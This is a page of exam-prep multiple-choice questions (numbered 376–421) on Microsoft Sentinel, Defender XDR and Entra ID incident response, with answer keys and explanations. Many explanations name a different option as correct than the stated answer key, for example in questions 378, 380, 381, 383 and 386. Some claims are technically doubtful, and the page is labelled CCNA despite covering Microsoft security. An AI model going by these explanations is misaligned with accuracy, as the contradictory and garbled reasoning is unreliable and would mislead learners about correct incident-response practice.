CCNA Respond to security incidents Questions

75 of 489 questions · Page 6/7 · Respond to security incidents · Answers revealed

376
MCQmedium

Your organization uses Microsoft Sentinel. A security analyst reports that an incident was automatically closed by a playbook before the investigation was complete. What should you do to prevent automatic closure in the future?

A.Disable the playbook
B.Remove the playbook from the automation rule
C.Modify the analytics rule to not automatically close incidents
D.Disable the automation rule that triggers the playbook
AnswerC

This prevents the playbook from closing incidents automatically.

Why this answer

Option C is correct because modifying the analytics rule to disable automatic incident closure stops the playbook from closing incidents automatically. Option A is wrong because disabling the playbook stops all its actions, not just closure. Option B is wrong because it disables all automation rules.

Option D is wrong because removing the playbook entirely is too drastic and unnecessary.

377
MCQhard

Refer to the exhibit. You are reviewing an automation rule in Microsoft Sentinel. What will happen when a new incident with severity Medium is created?

A.The rule will not trigger because severity is Medium
B.The rule will trigger and create a new incident
C.The rule will trigger and run the playbook
D.The rule will update the incident severity to High
E.The rule will trigger but skip the playbook
AnswerA

Condition is not met.

Why this answer

The automation rule triggers only on 'IncidentCreated' with condition 'IncidentSeverity Equals High'. Medium severity does not meet the condition, so the rule does not run.

378
MCQmedium

Refer to the exhibit. You are reviewing a Microsoft Sentinel automation rule definition. The rule is intended to automatically change the severity to High, assign to tier2, and set status to Active for incidents triggered by alerts containing 'malware'. However, incidents are not being updated. What is the most likely cause?

A.The action configuration is missing the 'incident' property.
B.The condition operator 'Contains' is incorrect; should be 'Equals'.
C.The trigger type should be 'IncidentCreated', not 'AlertRule'.
D.The playbook requires a managed identity to run.
AnswerC

Automation rules trigger on incident creation, not alert rule.

Why this answer

Option B is correct because the trigger type is 'Microsoft.SecurityInsights/AlertRule', which triggers on alert creation, not incident creation. Automation rules in Sentinel trigger on incident creation, not alert creation. Option A is wrong because the condition is valid.

Option C is wrong because the actions are correctly structured. Option D is wrong because there is no such requirement.

379
MCQeasy

An organization uses Microsoft Defender for Endpoint. A user reports that their device is running slowly and they see unexpected pop-ups. The security team suspects malware. What should the team do first to investigate?

A.Run a quick scan on the device from Microsoft Defender for Endpoint
B.Check the device inventory for recent software installations
C.Initiate a live response session on the device
D.Submit a suspicious file to Microsoft for analysis
AnswerA

A quick scan detects common malware efficiently.

Why this answer

Option A is correct because running a quick scan in Microsoft Defender for Endpoint will detect common malware quickly. Option B is wrong because submitting the file to Microsoft for analysis is not the first step. Option C is wrong because initiating a live response session is more invasive and should be used after initial detection.

Option D is wrong because checking the device inventory does not help with active malware.

380
MCQmedium

You are investigating an incident in Microsoft Defender XDR that involves a user who clicked a link in a phishing email. The email was detected and blocked by Microsoft Defender for Office 365, but the user still clicked the link before it was blocked. The incident includes an alert for 'Malicious URL click'. What additional information should you check to determine if the user's credentials were compromised?

A.Check if the link was blocked by the time the user clicked
B.Check for sign-in events from unusual locations or anonymous IP addresses after the click
C.Check if the user has recently changed their password
D.Check if the email had any attachments
AnswerB

Such sign-ins indicate that the attacker used stolen credentials.

Why this answer

Option D is correct because a URL click could lead to a credential harvesting page. Checking for subsequent failed logins from unusual locations indicates that credentials were used. Option A is wrong because the email was blocked, so there was no attachment.

Option B is wrong because a password reset does not indicate compromise. Option C is wrong because the block already happened; the click is what matters.

381
MCQmedium

You are a security analyst at Contoso. A user reports that they received a suspicious email with an attachment named "Invoice.pdf.exe". The user did not open the attachment. You need to investigate this potential threat using Microsoft Defender XDR. You want to determine if any other users received the same email, and whether the attachment was detonated in a sandbox. You also want to block the sender domain and the attachment hash across the organization if it is malicious. You have the email message ID from the user. You have appropriate permissions to use advanced hunting and take action. Which set of actions should you take in Microsoft 365 Defender?

A.Use the Exchange admin center to run a message trace for the email, then use the Malware section to block the attachment hash.
B.Use the Email & collaboration > Explorer to find the email, then use the Quarantine section to block the sender domain.
C.Use the Threat Explorer to find the email, then manually block the sender domain in the Exchange Online PowerShell.
D.Use Advanced hunting to query EmailEvents for the message ID to find other recipients, then query EmailAttachmentInfo to get the attachment hash. Use the sandbox data in EmailUrlInfo to check detonation. Then create an indicator block rule for the sender domain and file hash in the Settings > Indicators.
AnswerD

This comprehensive approach uses advanced hunting for investigation and indicators for blocking.

Why this answer

Option C is correct because advanced hunting can identify other recipients and sandbox detonation results, and indicators can block the sender domain and file hash. Option A is wrong because email trace is from Exchange admin center, not Defender XDR. Option B is wrong because quarantine finder doesn't show sandbox results.

Option D is wrong because it does not use indicators for blocking.

382
MCQhard

You are responding to an incident where a user's Microsoft Entra ID account was compromised and used to send phishing emails internally. You need to prevent further damage. Which two actions should you take first?

A.Reset the user's password
B.Revoke the user's sessions
C.Disable the user account in Microsoft Entra ID
D.Block all external email from the organization
E.Remove the user from all distribution groups
AnswerB, C

Invalidates any active tokens.

Why this answer

Option A is correct because disabling the account stops immediate use. Option D is correct because revoking sessions ensures any active tokens are invalidated. Option B is wrong because resetting password is secondary.

Option C is wrong because blocking external email is too broad. Option E is wrong because it's unnecessary for internal phishing.

383
MCQmedium

During an incident involving a compromised Azure VM, the security team wants to capture a memory dump for forensic analysis. The VM is running Windows Server 2022. What is the recommended approach?

A.Use Azure Backup to create a VM snapshot.
B.Establish a PowerShell remote session and run 'Get-Process | Export-CliXML'.
C.Initiate a live response session on the VM and run the 'dump memory' command.
D.Use Azure Disk Encryption to export the disk.
AnswerC

Live response in Microsoft Defender for Endpoint can collect memory dumps for analysis.

Why this answer

Option B is correct because initiating a live response session in Microsoft Defender for Endpoint allows running a memory dump collection command. Option A is wrong because taking a snapshot captures the disk, not memory. Option C is wrong because PowerShell remoting may not work if the VM is isolated.

Option D is wrong because Azure Backup captures disk state, not memory.

384
MCQmedium

You are investigating a security incident in Microsoft Defender XDR where a user received a phishing email that bypassed Exchange Online Protection. The email contained a link to a credential harvesting page. After the user entered credentials, the attacker used them to sign in from an unusual location. You need to recommend an automated response to prevent further credential theft from similar emails. What should you implement?

A.Create an Attack Simulation Training campaign in Microsoft Defender for Office 365.
B.Enable Cloud App Security to detect and block malicious cloud apps.
C.Enable Safe Links policy for all users.
D.Configure a Conditional Access policy to block sign-ins from unusual locations.
AnswerA

Attack Simulation Training educates users on recognizing phishing attempts, reducing the likelihood of credential theft.

Why this answer

Option A is correct because Attack Simulation Training in Microsoft Defender for Office 365 can create and automate phishing campaigns to train users, reducing the risk of credential theft. Option B is wrong because Safe Links protects against malicious links in real time but does not train users. Option C is wrong because Conditional Access policies require an identity provider and are not an automated response to emails.

Option D is wrong because Cloud App Security is for shadow IT discovery, not email-based phishing prevention.

385
MCQhard

During an incident response, a forensic investigator needs to collect a memory dump from a compromised Windows server that is still running. The server has Microsoft Defender for Endpoint installed but is not connected to the internet. Which method should the investigator use?

A.Collect a system memory snapshot from the Microsoft 365 Defender portal
B.Use Live Response to run a memory dump collector on the device
C.Initiate a memory dump from the Microsoft Defender for Endpoint portal
D.Use Sysinternals Suite to capture a memory dump locally
AnswerB

Live Response works even when the device is offline by using a separate communication channel.

Why this answer

Option D is correct because Live Response allows a live memory dump from an offline device via a connected channel. Option A is wrong because the device is offline, so the portal cannot initiate a dump. Option B is wrong because snapshot collection requires the device to be online.

Option C is wrong because Sysinternals is not part of Microsoft's recommended forensic toolkit for this scenario.

386
MCQeasy

You are an incident responder for a company using Microsoft 365 Defender. A critical incident is assigned to you. What is the first action you should take according to best practices?

A.Triage the incident to determine the scope and severity.
B.Escalate the incident to senior management.
C.Immediately isolate all affected devices.
D.Collect a full memory dump from the affected systems.
AnswerA

Triage is the first recommended step in any incident response.

Why this answer

Option C is correct because the first step in incident response is to triage the incident to understand its scope and severity before taking any action. Option A is wrong because isolating the device should only be done after assessing the impact. Option B is wrong because you need to investigate before collecting data.

Option D is wrong because escalation should occur after initial triage if needed.

387
MCQhard

During a ransomware incident, you need to prevent the encryption of files on a server running Windows Server 2022. You have Microsoft Defender for Endpoint Plan 2. Which attack surface reduction rule should you enable?

A.Block executable files from running unless they meet a prevalence, age, or trusted list criterion
B.Block credential stealing from the Windows local security authority subsystem
C.Block Adobe Reader from creating child processes
D.Use advanced protection against ransomware
AnswerD

Specifically blocks ransomware.

Why this answer

Option A is correct because 'Use advanced protection against ransomware' is a specific ASR rule that blocks ransomware behavior. Option B is wrong because 'Block executable files from running unless they meet a prevalence, age, or trusted list criterion' helps against unknown executables but not specifically ransomware. Option C is wrong because 'Block credential stealing from the Windows local security authority subsystem' targets credential theft.

Option D is wrong because 'Block Adobe Reader from creating child processes' is for PDF exploits.

388
MCQmedium

Based on the KQL query shown, what is the purpose of the case() function?

A.To aggregate counts by severity
B.To include alerts with name containing Malware or Ransomware
C.To filter alerts with severity High or Critical
D.To reclassify High severity alerts as Critical
AnswerD

The case() function changes AlertSeverity value from 'High' to 'Critical'.

Why this answer

Option A is correct because case() reclassifies 'High' severity alerts as 'Critical' for better prioritization. Option B is wrong because case() does not filter alerts; it only transforms the Severity field. Option C is wrong because the query already filters for Malware and Ransomware.

Option D is wrong because case() does not aggregate; summarize does that.

389
Multi-Selectmedium

Which TWO actions should a security analyst take to contain a ransomware outbreak on a Windows server that has Microsoft Defender for Endpoint installed?

Select 2 answers
A.Run a full scan with Microsoft Defender Antivirus
B.Reset the local administrator password
C.Initiate device isolation
D.Uninstall Microsoft Defender for Endpoint and reinstall
E.Restore the system from a backup
AnswersA, C

A full scan can detect and remove the ransomware.

Why this answer

Options B and D are correct. B isolates the device to prevent lateral movement, and D runs a scan to remove the ransomware. Option A is wrong because resetting the password does not stop the ransomware.

Option C is wrong because uninstalling would remove protection. Option E is wrong because a full restore might reintroduce the malware.

390
Multi-Selecthard

Your organization uses Microsoft Sentinel. A security incident related to a compromised user account has been fully investigated and remediated. Which THREE steps should you take to close the incident properly? (Choose three.)

Select 3 answers
A.Verify that all related alerts are resolved or closed.
B.Create a new analytics rule to detect similar activity.
C.Change the incident status to Closed and select an appropriate classification.
D.Add comments summarizing the investigation and remediation steps.
E.Delete the incident to clean up the workspace.
AnswersA, C, D

Ensures no residual alerts.

Why this answer

Options A, B, and D are correct. Adding comments documents the investigation, changing status to Closed with classification provides closure, and ensuring no related alerts remain prevents lingering issues. Option C (Deleting the incident) is not recommended.

Option E (Creating detection rule) is not necessary for closure.

391
MCQhard

Your Microsoft Sentinel workspace is receiving a high volume of false positive alerts from a specific analytics rule. You need to suppress these alerts without disabling the rule. Which feature should you use?

A.Create an automation rule to close incidents
B.Adjust the alert threshold in the analytics rule
C.Configure alert suppression in the analytics rule
D.Disable incident creation for the rule
AnswerC

Alert suppression stops the rule from creating alerts for matching conditions.

Why this answer

Option D is correct because alert suppression in Sentinel allows you to temporarily suppress alerts matching specific criteria. Option A is wrong because automation rules execute actions but do not suppress alerts. Option B is wrong because the alert threshold is a rule setting, not a suppression mechanism.

Option C is wrong because incident creation setting only controls whether incidents are created, not alert suppression.

392
Multi-Selectmedium

Your organization is responding to a ransomware incident. Which TWO actions should be taken first to contain the incident while preserving forensic evidence?

Select 2 answers
A.Isolate affected devices using Microsoft Defender for Endpoint.
B.Reset passwords for all users in the organization.
C.Disable compromised user accounts in Microsoft Entra ID.
D.Perform a factory reset on all affected devices.
E.Shut down network switches to isolate the network segment.
AnswersA, C

Isolation contains the threat and preserves data.

Why this answer

Option A (isolate affected devices) and Option B (disable compromised accounts) are correct first steps to contain the incident, as they stop lateral movement and further damage while preserving evidence. Option C is wrong because wiping devices destroys evidence. Option D is wrong because resetting passwords of all users is broad and not a containment step.

Option E is wrong because shutting down network ports may be necessary but is not a standard first step.

393
MCQeasy

During an incident response, a SOC analyst needs to automatically collect relevant evidence from multiple Microsoft 365 services. Which Microsoft Sentinel playbook trigger should the analyst configure?

A.Microsoft Sentinel Playbook trigger 'When a response action is executed'.
B.Microsoft Sentinel Scheduled Analytics rule trigger.
C.Microsoft Sentinel Alert trigger.
D.Microsoft Sentinel Incident trigger with action 'Collect evidence'.
AnswerD

Incident trigger allows playbooks to run on incident creation and collect evidence from various sources.

Why this answer

Option C is correct because 'When an incident is triggered' allows automation based on Sentinel incidents. Option A is wrong because 'When a new alert is created' is too granular and not designed for multi-service evidence collection. Option B is wrong because 'When a response action is executed' is not a standard trigger.

Option D is wrong because a scheduled query is for hunting, not for automated response.

394
MCQeasy

A security analyst in your organization receives an alert from Microsoft Defender for Cloud Apps indicating that a user has installed a third-party app with high permissions in Microsoft 365. The analyst suspects a consent phishing attack. Which playbook in Microsoft Sentinel should the analyst use to automate the investigation and remediation?

A.Automation rule
B.Hunting query
C.Entity page
D.Workbook
AnswerC

Entity page provides a consolidated view of all activities related to a user.

Why this answer

The correct answer is B because the 'Entity page' in Microsoft Sentinel provides a consolidated view of all alerts, incidents, and activities related to a specific user, enabling efficient investigation of consent phishing. Option A is wrong because Automation rules are for automated response, not investigation. Option C is wrong because Hunting queries are for proactive threat hunting, not immediate investigation.

Option D is wrong because Workbooks are for visualizations and reporting, not investigation.

395
Multi-Selectmedium

Which TWO actions should you perform to contain a ransomware incident in Microsoft Defender for Endpoint?

Select 2 answers
A.Reset the local administrator password.
B.Isolate the device from the network.
C.Run a full antivirus scan.
D.Kill the malicious processes.
E.Collect the ransomware sample for analysis.
AnswersB, D

Isolation stops communication with command and control.

Why this answer

Options B and D are correct. Isolating the device prevents further spread, and killing malicious processes stops encryption. Option A is wrong because running antivirus may not be immediate containment.

Option C is wrong because resetting passwords is for user accounts, not endpoints. Option E is wrong because collecting files is for investigation, not containment.

396
MCQeasy

A security analyst receives a Microsoft Defender for Identity alert about a suspicious Kerberos attack. The analyst needs to contain the compromised account immediately. What should the analyst do?

A.Disable the user account in Microsoft Entra ID.
B.Remove the user from all privileged groups.
C.Require the user to change their password at next sign-in.
D.Reset the user's password and notify the user.
AnswerA

Disabling stops all authentication.

Why this answer

Option A is correct because disabling the account in Microsoft Entra ID stops authentication. Option B is wrong because resetting password without disabling may allow ongoing attacks. Option C is wrong because removing from groups does not prevent authentication.

Option D is wrong because the user's own password reset may not be effective.

397
Multi-Selecteasy

Which TWO of the following are valid data connectors for Microsoft Sentinel? (Select TWO.)

Select 2 answers
A.Docker containers
B.Amazon RDS
C.Azure Firewall
D.Google Cloud Storage
E.Microsoft Entra ID
AnswersC, E

Azure Firewall connector is available.

Why this answer

Options B and D are correct. Microsoft Entra ID and Azure Firewall have built-in connectors. Option A is wrong because Google Cloud Storage is not a default connector; it requires custom ingestion.

Option C is wrong because Docker is not a data source for Sentinel. Option E is wrong because Amazon RDS is not a direct connector.

398
MCQmedium

During an investigation, you need to check if any user has been assigned privileged roles in Microsoft Entra ID outside of normal business hours. Which data source would provide this information?

A.OfficeActivity (Office 365)
B.SecurityEvent (Windows Event Logs)
C.SigninLogs (Microsoft Entra ID)
D.AuditLogs (Microsoft Entra ID)
AnswerD

AuditLogs track administrative activities including role assignments.

Why this answer

Option A is correct because AuditLogs in Azure AD (now Entra ID) capture role assignment changes. Option B (SigninLogs) shows sign-ins but not role changes. Option C (SecurityEvent) is for Windows events.

Option D (OfficeActivity) is for Office 365 workloads.

399
MCQhard

Fabrikam has a hybrid environment with on-premises Active Directory synced to Microsoft Entra ID. They use Microsoft Sentinel and Microsoft Defender XDR. A critical incident is opened: 'Credential theft detected - domain admin account compromised.' The incident includes alerts from Microsoft Defender for Identity (MDI) showing anomalous Kerberos ticket requests and from Microsoft Defender for Endpoint showing a process dump on a domain controller. You need to contain the incident immediately. The organization has a strict policy of not disabling the domain admin account without approval due to critical dependencies. Which of the following is the BEST course of action?

A.Reset the domain admin password and revoke sessions in Microsoft Entra ID.
B.Disable the domain admin account temporarily.
C.Isolate the domain controller using Microsoft Defender for Endpoint.
D.Reset the krbtgt account password twice to force Kerberos ticket invalidation.
AnswerD

This invalidates all existing Kerberos tickets, cutting off attacker access.

Why this answer

Option A is correct: resetting the krbtgt account password twice forces all Kerberos tickets to be invalidated, effectively containing credential theft without disabling the account. Option B is wrong because isolating the domain controller would disrupt services. Option C is wrong because resetting the domain admin password alone does not invalidate existing Kerberos tickets.

Option D is wrong because disabling the account violates policy.

400
Multi-Selectmedium

Which THREE steps should be included in a Microsoft Sentinel playbook for automatic incident response when a high-severity alert fires?

Select 3 answers
A.Investigate the alert by enriching with threat intelligence
B.Notify the security team via email or Teams
C.Pause the incident for 24 hours before taking action
D.Create a new Azure resource for logging
E.Contain the threat by blocking indicators
AnswersA, B, E

Enrichment helps validate the alert.

Why this answer

The playbook should investigate, contain, and notify. Pausing the incident is not standard; the playbook should run immediately. Creating a new Azure resource is not typically part of incident response.

401
Multi-Selecthard

Which THREE conditions must be met for Microsoft Sentinel to automatically run a playbook on an incident?

Select 3 answers
A.The incident severity must be set to High or Critical
B.The playbook must have the Sentinel Responder role assigned
C.The incident must be created by a scheduled or NRT analytics rule
D.The user must be signed in to the Azure portal
E.The playbook must be set to 'Enabled' on the automation rule
AnswersB, C, E

Permissions are required for the playbook to run.

Why this answer

The playbook must be enabled for automatic triggers, the incident must be created by an analytics rule, and the playbook must have the correct permissions. The user does not need to be signed in, and the incident does not need to be of a specific severity.

402
MCQmedium

You are responding to an incident where a user's credentials were used to access a federated SaaS application from an IP address associated with a known threat actor. The user's account is not disabled. Which action is most effective to prevent further unauthorized access?

A.Reset the user's password and revoke active sessions
B.Create a Conditional Access policy to block the IP
C.Disable the user's account
D.Block the source IP address on the firewall
AnswerA

This invalidates the compromised credentials and terminates current sessions.

Why this answer

Resetting the user's password and revoking tokens is the most effective because it invalidates current sessions and prevents further use of stolen credentials. Disabling the account is also effective but may cause business disruption; resetting and revoking is less disruptive. Blocking IP may not be effective if threat actor uses different IPs.

Conditional access policy change is slower.

403
Multi-Selectmedium

Which THREE actions should you take when investigating a potential data exfiltration incident detected by Microsoft Defender for Cloud Apps?

Select 3 answers
A.Create a file policy to detect similar activities in the future
B.Check Microsoft Defender for Identity for related alerts
C.Use the investigation tools to search for related events in Microsoft Sentinel
D.Run a cloud discovery report to identify unsanctioned apps
E.Review the user's activity log in the Defender for Cloud Apps portal
AnswersA, C, E

Helps in preventing future exfiltration.

Why this answer

Option A is correct because governance actions can be applied to the user. Option C is correct because SIEM integration provides context. Option D is correct because file policies are key.

Option B is wrong because MDI is for on-premises AD. Option E is wrong because cloud discovery is for shadow IT.

404
Multi-Selectmedium

Which THREE components can be used in Microsoft Sentinel to automate incident response?

Select 3 answers
A.Automation rules
B.Triggers
C.Playbooks
D.Watchlists
E.Analytics rules
AnswersA, B, C

Automation rules define conditions and actions for incident response.

Why this answer

Correct answers are A, B, and E. Automation rules, playbooks, and triggers are part of Microsoft Sentinel's automation capabilities. Analytics rules generate incidents but do not automate response.

Watchlists are for enrichment, not automation.

405
MCQmedium

Your organization uses Microsoft Defender for Cloud Apps. A security analyst receives an alert for a suspicious sign-in from an IP address in a sanctioned app. The analyst needs to immediately block the user from accessing the app. Which action should the analyst take?

A.Suspend the user account in Microsoft Entra ID.
B.Add the IP address to the blocked IP list in Defender for Cloud Apps.
C.Create a new access policy in Defender for Cloud Apps to block the user.
D.Revoke the user's session tokens in Microsoft Entra ID.
AnswerA

Suspending the user immediately blocks all access, including the sanctioned app.

Why this answer

Option C is correct because suspending the user in Microsoft Entra ID is the fastest way to block access across all apps. Option A is wrong because creating a block policy takes time. Option B is wrong because blocking the IP may affect other users.

Option D is wrong because revoking session tokens may not prevent new sign-ins immediately.

406
MCQmedium

You are responding to an incident where a malicious PowerShell script was executed on multiple endpoints. You need to collect the script content from the affected devices for analysis. What should you use?

A.Microsoft Defender for Cloud Apps activity logs
B.Microsoft Defender for Endpoint live response
C.Microsoft Purview eDiscovery
D.Azure Automation runbook
AnswerB

Live response allows file collection and script execution.

Why this answer

Option C is correct because Microsoft Defender for Endpoint live response allows you to remotely collect files from devices. Option A is wrong because Microsoft Defender for Cloud Apps is for cloud apps. Option B is wrong because Azure Automation runbooks are for orchestration.

Option D is wrong because Microsoft Purview eDiscovery is for legal discovery.

407
MCQhard

Your organization uses Microsoft Sentinel and Microsoft Defender for Cloud. A critical server in Azure was compromised by ransomware. The incident response team needs to ensure that no other resources in the same resource group are affected. What is the most immediate containment action?

A.Delete the virtual machine immediately to stop the ransomware.
B.Disable the public IP address and apply an NSG rule to block all inbound/outbound traffic to the server's subnet.
C.Change the local administrator password on the VM.
D.Move the VM to a different virtual network and subnet.
AnswerB

This network isolation prevents lateral movement while preserving the VM for forensic analysis.

Why this answer

Option A is correct because disabling the public IP and applying a network security group (NSG) block isolates the server while preserving the disk. Option B is wrong because deleting the VM destroys evidence. Option C is wrong because moving the VM to a different subnet does not prevent lateral movement from the original IP.

Option D is wrong because changing the administrator password does not stop ransomware from running.

408
MCQhard

During an incident response, a security engineer needs to block an attacker's IP address at the network level for all devices in the organization. The organization uses Microsoft Defender for Endpoint and Microsoft Intune for device management. What is the most efficient way to achieve this?

A.Add the IP address to a blocklist in Microsoft Sentinel
B.Create a device configuration policy in Microsoft Intune to block the IP
C.Configure Azure Firewall to block the IP
D.Create a custom indicator (IOC) for the IP address in Microsoft Defender for Endpoint
AnswerD

Custom indicators block IPs across all Defender for Endpoint devices.

Why this answer

Option A is correct because a custom indicator in Defender for Endpoint blocks the IP across all onboarded devices. Option B is wrong because blocking in Microsoft Sentinel only affects log ingestion, not network traffic. Option C is wrong because Intune policies are for configuration, not real-time blocking.

Option D is wrong because Azure Firewall would need to be in the network path and is a separate product.

409
Multi-Selecthard

You are investigating a potential data exfiltration incident in Microsoft Purview. A user has been downloading large amounts of data from a SharePoint site to an unmanaged device. Which TWO actions should you take to contain the exfiltration? (Choose two.)

Select 2 answers
A.Remove the user's permissions to the SharePoint site.
B.Apply a sensitivity label to the SharePoint site to restrict access.
C.Create a data loss prevention (DLP) policy to block downloads from unmanaged devices.
D.Disable the user's device in Microsoft Intune.
E.Create a retention policy for the SharePoint site.
AnswersA, C

Removing permissions immediately stops the user from accessing data.

Why this answer

Option A and D are correct. Blocking downloads from unmanaged devices using Conditional Access or DLP policies prevents further exfiltration. Removing the user's access to the site stops immediate access.

Option B is wrong because creating a sensitivity label may not apply retroactively. Option C is wrong because disabling the device may not stop the user from accessing data from another device. Option E is wrong because creating a retention policy is for data preservation, not containment.

410
Multi-Selecteasy

Which TWO are legitimate sources of threat intelligence that can be ingested into Microsoft Sentinel?

Select 2 answers
A.STIX/TAXII threat intelligence feeds
B.Microsoft Defender Threat Intelligence
C.Exchange Online Protection
D.Microsoft Intune
E.Microsoft Purview Compliance Manager
AnswersA, B

Sentinel supports ingesting TI from STIX/TAXII servers.

Why this answer

A is correct because STIX/TAXII is an open-source standard for sharing cyber threat intelligence (CTI). Microsoft Sentinel can ingest threat indicators from any TAXII 2.0 or 2.1 server using the built-in Threat Intelligence - TAXII data connector, allowing organizations to consume structured threat feeds (e.g., from MITRE ATT&CK or third-party providers) directly into Sentinel for correlation and alerting.

Exam trap

The trap here is that candidates confuse security management tools (like EOP, Intune, or Compliance Manager) with actual threat intelligence sources, assuming any Microsoft security product can be a threat feed, whereas only dedicated CTI platforms or feeds (STIX/TAXII, Microsoft Defender Threat Intelligence) provide structured indicator ingestion.

411
MCQeasy

Your organization uses Microsoft Sentinel and Microsoft Defender XDR. You have a custom analytics rule that triggers on a Defender for Endpoint alert. When the rule triggers, a playbook is executed that creates an incident in Microsoft Sentinel and sends a message to a Teams channel. The playbook fails to execute. Which permission should you verify first?

A.The Teams channel has the appropriate permissions for incoming webhooks
B.The analyst has Microsoft Sentinel Reader role
C.The user has Microsoft Entra ID Global Administrator role
D.The automation rule has the correct managed identity or connection permissions
AnswerD

Automation rules use managed identities or connections to run playbooks; misconfiguration causes failure.

Why this answer

Option A is correct because playbooks require an automation rule with appropriate permissions to run. Option B is wrong because Teams channel permissions are for posting messages, not for playbook execution. Option C is wrong because Microsoft Sentinel reader role is for viewing incidents, not executing playbooks.

Option D is wrong because Microsoft Entra ID admin rights are not required for playbook execution.

412
MCQhard

Your organization has deployed Microsoft Sentinel and uses the Microsoft 365 connector to ingest audit logs. You receive an alert from Microsoft Defender for Office 365 about a phishing email that was delivered to a user's inbox. You need to create an incident in Sentinel and automatically quarantine the email. What is the most efficient way to achieve this?

A.Use Microsoft Defender for Cloud Apps to investigate the alert and manually quarantine the email
B.Create a custom analytics rule that triggers when an alert is generated, and configure the rule to run a playbook that quarantines the email
C.Create an automation rule in Microsoft Sentinel that is triggered when this specific alert is generated, and associate a playbook that uses the Microsoft 365 Defender connector to quarantine the email
D.Manually create an incident in Microsoft Sentinel and then run a playbook to quarantine the email
AnswerC

This automates the response.

Why this answer

The correct answer is C because Microsoft Sentinel can trigger an automation rule that runs a playbook to quarantine the email using Microsoft 365 Defender actions. Option A is wrong because the old Threat Explorer portal is not integrated with Sentinel. Option B is wrong because manual quarantine is not automatic.

Option D is wrong because it suggests manual creation.

413
MCQmedium

Your organization uses Microsoft Sentinel with the UEBA (User and Entity Behavior Analytics) feature enabled. A security analyst notices that a user account has been flagged with an anomaly indicating a possible compromised credential. Which entity type in Microsoft Sentinel's UEBA is most relevant for this alert?

A.Device
B.Application
C.IP address
D.User account
AnswerD

UEBA focuses on user behavior.

Why this answer

The correct answer is B because UEBA in Sentinel tracks user accounts as entities. Option A is wrong because devices are not directly related to credential compromise. Option C is wrong because IP addresses are contextual but not the primary entity.

Option D is wrong because applications are not entities in UEBA for credential compromise.

414
MCQeasy

An incident in Microsoft Defender XDR shows a device with high severity alert: 'Suspicious PowerShell command line.' The device is currently isolated from the network. What is the best next step to investigate the alert?

A.Review the device timeline for related alerts.
B.Run a live response session on the device.
C.Restore network connectivity to allow the device to communicate with the cloud for analysis.
D.Initiate a full antivirus scan on the device.
AnswerB

Live response allows remote investigation and remediation on an isolated device, enabling collection of evidence and running scripts safely.

Why this answer

Running a live response session allows the analyst to remotely investigate the isolated device, collect artifacts, or execute commands without risking lateral movement. Full scan is reactive; reviewing timeline is passive; restoring connectivity prematurely could spread the threat.

415
Multi-Selecthard

Which TWO actions should you take when responding to a confirmed ransomware incident in Microsoft Defender for Endpoint?

Select 2 answers
A.Run a full antivirus scan on the affected devices.
B.Allow the ransomware executable in the firewall.
C.Collect an investigation package from the affected devices.
D.Isolate the affected devices from the network.
E.Initiate a live response session to delete files.
AnswersA, D

Scanning can remove malware.

Why this answer

Options B and D are correct. Isolating affected devices prevents spread, and running antivirus scans cleans the device. Option A is wrong because allowing malicious files is dangerous.

Option C is wrong because collecting investigation package is for analysis, not immediate response. Option E is wrong because initiating live response might be needed but is not a standard first action.

416
MCQmedium

Your organization uses Microsoft Sentinel. A security analyst receives an alert indicating that a user account was used to sign in from an unfamiliar location. You need to investigate the incident using Microsoft Defender XDR. Which action should you take first?

A.Create an automated playbook to reset the user's password.
B.Review the alert in the Microsoft Defender XDR portal and classify it as a true or false positive.
C.Turn off the user account in Microsoft Entra ID.
D.Reset the user's password immediately to prevent further access.
AnswerB

First step is to classify the incident.

Why this answer

Option D is correct because the first step in incident response is to classify the incident as a true or false positive. Option A is wrong because creating a playbook should be done after confirming the incident is a true positive. Option B is wrong because resetting the password should be a containment action after classification.

Option C is wrong because turning off the user account is a containment action, not the first step.

417
MCQeasy

During an incident response, you need to collect forensic evidence from a compromised Windows device using Microsoft Defender for Endpoint live response. Which command should you use to gather running processes?

A.dir
B.reg query
C.netstat
D.processes
AnswerD

The 'processes' command lists running processes.

Why this answer

Option B is correct because 'processes' is a built-in command in live response to list running processes. Option A is wrong because 'netstat' shows network connections. Option C is wrong because 'reg query' accesses the registry.

Option D is wrong because 'dir' lists files.

418
MCQhard

The exhibit shows a KQL query used during incident investigation. The analyst wants to identify devices with an unusually high number of outbound connections to public IPs. The query returns no results, though the analyst suspects there should be some. What is the most likely reason?

A.The timeframe is too short.
B.Data retention for DeviceNetworkEvents is less than 1 day.
C.The field 'RemoteIPType' does not exist in DeviceNetworkEvents.
D.The 'summarize' operator is misused.
AnswerC

The correct field is usually 'RemoteIP' and classification is done by IP ranges.

Why this answer

The RemoteIPType field may not exist in DeviceNetworkEvents; the correct field for public IP classification is typically RemoteIP. Option A is possible but less likely; Option C is a syntax error; Option D is about data retention.

419
MCQeasy

Your organization uses Microsoft Sentinel and Microsoft Defender XDR. An incident is generated for a user who received a phishing email that bypassed Exchange Online Protection. The user clicked the link and entered credentials on a fake login page. The incident includes alerts from Microsoft Defender for Office 365 and Microsoft Entra ID. You need to respond to the incident. The affected user has administrative privileges. Which of the following should you do FIRST?

A.Reset the user's password and revoke sessions in Microsoft Entra ID.
B.Report the phishing email to Microsoft for analysis.
C.Create a transport rule to block similar phishing emails.
D.Delete the phishing email from the user's mailbox.
AnswerA

Immediately invalidates stolen credentials.

Why this answer

Option D is correct: resetting the user's password and revoking sessions immediately prevents attacker use of stolen credentials. Option A is wrong because reporting the email is not urgent. Option B is wrong because deleting the email is good but does not address compromised credentials.

Option C is wrong because creating a rule is a longer-term action.

420
MCQeasy

Contoso uses Microsoft Sentinel with the Microsoft Defender for Cloud Apps connector. An incident is generated: 'Unusual file download by user - possible data exfiltration.' The incident shows that a user downloaded 500 files from SharePoint Online within 10 minutes, which is abnormal for that user. The user's account shows no other suspicious activity. You need to respond. Which of the following is the BEST first action?

A.Block SharePoint Online access for all users temporarily.
B.Create an anomaly detection policy for such downloads.
C.Suspend the user account in Microsoft Entra ID.
D.Investigate the user's recent activity logs.
AnswerC

Immediately stops the user from accessing any resources.

Why this answer

Option B is correct: suspending the user in Microsoft Entra ID immediately stops any further downloads. Option A is wrong: investigating first allows more data to be exfiltrated. Option C is wrong: blocking SharePoint affects all users.

Option D is wrong: creating a policy is a long-term improvement.

421
MCQmedium

You are a security analyst for a company using Microsoft Defender XDR. An incident is detected involving a device that has been communicating with a known command-and-control (C2) server. The device is currently online and the user is active. What should you do first to contain the threat?

A.Isolate the device from the network using Microsoft Defender for Endpoint
B.Run a full antivirus scan on the device
C.Notify the user to disconnect the device
D.Kill the suspicious processes on the device
AnswerA

